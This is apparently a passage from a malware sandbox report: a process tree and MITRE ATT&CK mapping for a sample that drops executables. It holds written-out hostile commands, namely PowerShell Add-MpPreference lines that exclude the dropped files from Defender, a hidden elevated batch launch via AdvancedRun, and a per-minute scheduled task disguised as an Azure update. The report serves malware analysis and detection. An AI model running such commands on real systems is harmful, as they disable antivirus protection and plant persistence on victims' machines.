      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:2928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:4644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:7220
  - - C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      4⤵
      Executes dropped EXE
      PID:7668
    - - C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe" /SpecialRun 4101d8 7668
        5⤵
        
        PID:7740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe
      "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe"
      4⤵
      Executes dropped EXE
      PID:8144
    - - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:8160
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1492
  2⤵
  - Program crash
  PID:4828

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5928

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5672

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4520

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2776

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5168

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2432

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5684

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6084

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4040

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:8092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7608

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery